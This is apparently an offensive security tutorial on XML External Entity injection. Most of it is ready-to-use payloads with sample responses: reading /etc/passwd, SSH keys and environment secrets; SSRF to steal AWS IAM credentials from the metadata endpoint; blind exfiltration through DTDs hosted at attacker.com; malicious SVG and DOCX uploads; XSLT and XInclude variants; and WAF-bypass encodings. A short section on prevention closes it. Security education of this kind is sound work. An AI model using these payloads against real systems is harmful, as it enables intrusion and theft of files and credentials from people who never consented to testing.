XXE — XML External Entity Injection Deep Dive

1. Classic XXE — Local File Read

The classic XXE payload defines an external entity that references a local file path using the file:// protocol. When the XML parser resolves the entity and the application reflects the entity value in its response, the file contents are returned to the attacker.

Technique 01 XXE to read /etc/passwd

POST /api/xml-parse HTTP/1.1
Host: target.com
Content-Type: application/xml
Cookie: session=masaaki_session_token

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInput>
  <username>&xxe;</username>
</userInput>

--- Response ---
HTTP/1.1 200 OK
{
  "error": "Invalid username: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:..."
}

Other High-Value File Paths

# Linux
file:///etc/passwd
file:///etc/shadow          # Requires root
file:///etc/hosts
file:///etc/nginx/nginx.conf
file:///var/www/html/.env
file:///proc/self/environ   # App environment variables (DB passwords, API keys)
file:///proc/self/cmdline
file:///home/ubuntu/.ssh/id_rsa
file:///home/masaaki/.ssh/authorized_keys
file:///app/config.py
file:///app/settings.py

# Windows
file:///C:/Windows/win.ini
file:///C:/inetpub/wwwroot/web.config
file:///C:/Windows/System32/drivers/etc/hosts
file:///C:/Users/Administrator/.ssh/id_rsa

2. XXE SSRF — Internal HTTP Requests

External entities can reference not just file:// but also http:// URLs. The XML parser fetches the URL server-side — this is SSRF triggered through XXE. Combined with cloud metadata endpoints, this is a critical finding.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&xxe;</data></root>

--- Response contains ---
prod-ec2-role

# Follow up — fetch the credentials:
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/prod-ec2-role">

--- Response contains AWS credentials ---
{
  "AccessKeyId": "ASIA3X...",
  "SecretAccessKey": "wJalrX...",
  "Token": "AQoX..."
}

# Internal service enumeration via XXE-SSRF:
<!ENTITY xxe SYSTEM "http://10.0.0.1:6379/">
# Redis banner: -ERR wrong number of arguments

When the application parses XML but does not reflect entity values in its response, classic XXE appears to fail. However, the parser still resolves entities and makes outbound connections. An out-of-band DNS lookup confirms the vulnerability even with zero response reflection.

Technique 02 Blind XXE — DNS callback via Burp Collaborator

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://r7k2z9x8.oastify.com/">
]>
<root><data>&xxe;</data></root>

--- Collaborator receives ---
DNS: r7k2z9x8.oastify.com from 54.203.xx.xx
HTTP: GET / HTTP/1.1  Host: r7k2z9x8.oastify.com
      User-Agent: Java/11.0.14

# Confirmed blind XXE — now escalate to data exfiltration
# using external DTD technique (next section)

The DNS callback alone confirms that:

The XML parser processes external entities
The server makes outbound HTTP/DNS requests
The egress firewall does not block outbound connections on port 80

Reading a file through a blind XXE channel requires two components: a parameter entity that reads the file, and a second entity that exfiltrates the content via an HTTP request. The trick is that standard entities cannot reference other entities in an internal DTD — but an external DTD has this capability.

Technique 03 Blind XXE file exfiltration via external DTD + HTTP callback

Host this DTD file at https://attacker.com/exfil.dtd:

<!-- exfil.dtd hosted on attacker server -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % wrap "<!ENTITY % send SYSTEM 'https://attacker.com/collect?data=%file;'>">
%wrap;
%send;

Then submit this XML to the target:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "https://attacker.com/exfil.dtd">
  %dtd;
]>
<root><data>trigger</data></root>

--- Attacker server receives ---
GET /collect?data=root:x:0:0:root:/root:/bin/bash%0adaemon:x:1:1:... HTTP/1.1

Limitation: File contents with newlines may break the HTTP URL. Use a two-stage approach: first read into a parameter entity, then base64-encode via an XSLT or a PHP wrapper (php://filter/convert.base64-encode/resource=/etc/passwd) if PHP is the backend.

PHP Filter Wrapper for Clean Exfiltration

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % wrap "<!ENTITY % send SYSTEM 'https://attacker.com/b64?d=%file;'>">
%wrap;
%send;

# Attacker receives clean base64 — decode locally:
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo=" | base64 -d

5. Error-Based XXE

When out-of-band HTTP connections are blocked by an egress firewall, error-based XXE is an in-band alternative. The technique triggers an XML parse error whose error message contains the file contents. Requires that verbose error messages are returned by the application.

<!-- Host on attacker server: error.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % error "<!ENTITY % boom SYSTEM 'file:///nonexistent/%file;'>">
%error;
%boom;

<!-- XXE payload to target: -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "https://attacker.com/error.dtd">
  %dtd;
]>
<root/>

--- Response error message ---
XML parse error: file not found:
/nonexistent/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

The file contents appear in the error path — no outbound connection needed. Works even with strict egress filtering.

6. XXE via XInclude

XInclude is an XML specification that allows one XML document to include another. When you do not control the XML document's DOCTYPE declaration (e.g., your input is embedded server-side into a larger XML structure), XInclude lets you inject file reads without a DOCTYPE entity.

Technique 04 XInclude file read — no DOCTYPE needed

POST /api/product/search HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

query=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

--- Response ---
<result>
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:...
</result>

parse="text" is critical — without it, the included file must be valid XML or parsing fails. Text mode reads arbitrary file content as a character data node.

7. XXE via File Upload

SVG Files

SVG is XML. Any endpoint that accepts SVG uploads and processes them server-side (resizing, converting, validating) is an XXE surface.

<!-- malicious.svg -->
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <text y="20">&xxe;</text>
</svg>

# Upload via multipart form, then trigger server-side processing
# (e.g., convert to PNG, generate thumbnail, validate dimensions)

DOCX / XLSX (Office Open XML)

Office documents are ZIP archives containing XML files. The main content is in word/document.xml (DOCX) or xl/workbook.xml (XLSX). Unzip, inject XXE, rezip, and upload.

# Unzip the DOCX
unzip original.docx -d docx_dir

# Edit word/document.xml — add DOCTYPE to the XML declaration:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<w:document ...>
  <w:body>
    <w:p><w:r><w:t>&xxe;</w:t></w:r></w:p>
  </w:body>
</w:document>

# Repack
cd docx_dir && zip -r ../malicious.docx . && cd ..

# Upload to "import document", "parse invoice", or "extract text" feature

OpenDocument Format (ODT)

# content.xml inside ODT ZIP:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE office:document-content [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<office:document-content ...>
  <office:body>
    <office:text>&xxe;</office:text>
  </office:body>
</office:document-content>

8. XXE via XSLT Processing

XSLT (XSL Transformations) is XML-based. Many XSLT processors support external entities and document() function calls that read local or remote files. If an application lets users supply XSLT stylesheets, it is almost certainly exploitable.

<!-- malicious.xsl -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <output>&xxe;</output>
  </xsl:template>
</xsl:stylesheet>

<!-- Via XSLT document() function — no DOCTYPE needed -->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:value-of select="document('file:///etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>

<!-- SSRF via XSLT -->
<xsl:value-of select="document('http://169.254.169.254/latest/meta-data/')"/>

9. XXE via Modified Content-Type

REST endpoints that normally accept JSON can sometimes be coerced into parsing XML by changing the Content-Type header. Many frameworks auto-detect content type or fall back to an XML parser if JSON parsing fails.

Technique 05 JSON endpoint accepting XML via Content-Type swap

# Original request:
POST /api/users HTTP/1.1
Content-Type: application/json

{"username": "masaaki", "email": "[email protected]"}

# Modified request — swap Content-Type to XML:
POST /api/users HTTP/1.1
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <username>&xxe;</username>
  <email>[email protected]</email>
</root>

# Also try:
Content-Type: text/xml
Content-Type: application/rss+xml
Content-Type: application/atom+xml

10. XXE Filter Bypass Techniques

WAFs and input filters may block common XXE patterns like SYSTEM, DOCTYPE, or ENTITY. These techniques evade string-matching filters.

Encoding Tricks

# UTF-16 encoding — parser decodes before WAF sees the plaintext
# Convert payload to UTF-16-LE or UTF-16-BE
Content-Type: application/xml; charset=UTF-16

# Declare encoding in XML declaration:
<?xml version="1.0" encoding="UTF-16"?>

# UTF-7 (older parsers):
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo +AFs-
+ADwAIQ-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACIAPg-
+AF0APg-

Parameter Entity Indirection

# When ENTITY keyword is blocked, use parameter entities only:
<!DOCTYPE foo [
  <!ENTITY % a "fil">
  <!ENTITY % b "e:">
  <!ENTITY % c "//etc/passwd">
  <!ENTITY % xxe SYSTEM "file:///etc/passwd">
]>

# Some parsers allow concatenating parameter entities:
<!ENTITY % path "%a;%b;%c;">

Protocol Alternatives

# PHP-specific wrappers (bypass file:// filter)
php://filter/read=convert.base64-encode/resource=/etc/passwd
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
expect://id   # PHP expect:// wrapper — RCE if enabled

# Java classpath loading
jar:file:///var/www/app/webapp.jar!/
jar:http://attacker.com/evil.jar!/

# netdoc:// (older Java)
netdoc:///etc/passwd

Bypassing Blocked DOCTYPE

# If DOCTYPE is WAF-blocked, try Unicode normalization:
<!doctype          # lowercase
<!DOCTYPE      # character reference for O
<!DO%43TYPE       # URL-encoding (if double-decoded)

# Whitespace injection — some WAFs tokenize on space:
<!DOCTYPE
foo
[<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

11. Prevention & Mitigations

Disable external entity processing

The primary fix: disable DTD processing and external entity resolution in the XML parser. In Java: factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true). In Python lxml: use resolve_entities=False. In PHP: libxml_disable_entity_loader(true) (deprecated in PHP 8 — now disabled by default).

Use safe parser configurations

For Java SAX parsers, explicitly set: XMLConstants.FEATURE_SECURE_PROCESSING to true, and set ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA to empty strings. For .NET, use XmlReaderSettings with DtdProcessing = DtdProcessing.Prohibit.

Prefer JSON or protocol buffers

Where XML is not a hard requirement, switch to JSON or protobuf. JSON parsers have no concept of external entities. Removing the XML attack surface entirely is the most reliable mitigation.

Validate and sandbox file uploads

Process uploaded Office/SVG files in an isolated sandbox with no network access and no filesystem read privileges outside a designated directory. Use a dedicated microservice with a stripped-down container that has no credentials or sensitive files accessible.

Network egress filtering

Even when XXE is present, restricting outbound network access prevents OOB data exfiltration. Ensure application servers cannot make arbitrary outbound HTTP/DNS requests. This reduces blind XXE to error-based only (which requires verbose errors to be useful).

Audit all Content-Type paths

Ensure REST endpoints reject unexpected Content-Types. Return HTTP 415 Unsupported Media Type for application/xml if only JSON is intended. Configure frameworks to not fall back to XML parsing when the declared type is application/json.

Testing checklist: Test every XML-accepting endpoint (SOAP, REST with XML content-type, file upload). Try swapping Content-Type from JSON to XML on JSON endpoints. Test all document upload features (SVG, DOCX, XLSX, ODT, PPTX). Try XInclude when DOCTYPE is blocked. Always use a Collaborator/interactsh host to detect blind XXE before attempting file reads.

XXE — XML External Entity Injection Deep Dive

1. Classic XXE — Local File Read

Other High-Value File Paths

2. XXE SSRF — Internal HTTP Requests

3. Blind XXE — Out-of-Band via DNS

4. Blind XXE — Data Exfiltration via External DTD

PHP Filter Wrapper for Clean Exfiltration

5. Error-Based XXE

6. XXE via XInclude

7. XXE via File Upload

SVG Files

DOCX / XLSX (Office Open XML)

OpenDocument Format (ODT)

8. XXE via XSLT Processing

9. XXE via Modified Content-Type

10. XXE Filter Bypass Techniques

Encoding Tricks

Parameter Entity Indirection

Protocol Alternatives

Bypassing Blocked DOCTYPE

11. Prevention & Mitigations

Disable external entity processing

Use safe parser configurations

Prefer JSON or protocol buffers

Validate and sandbox file uploads

Network egress filtering

Audit all Content-Type paths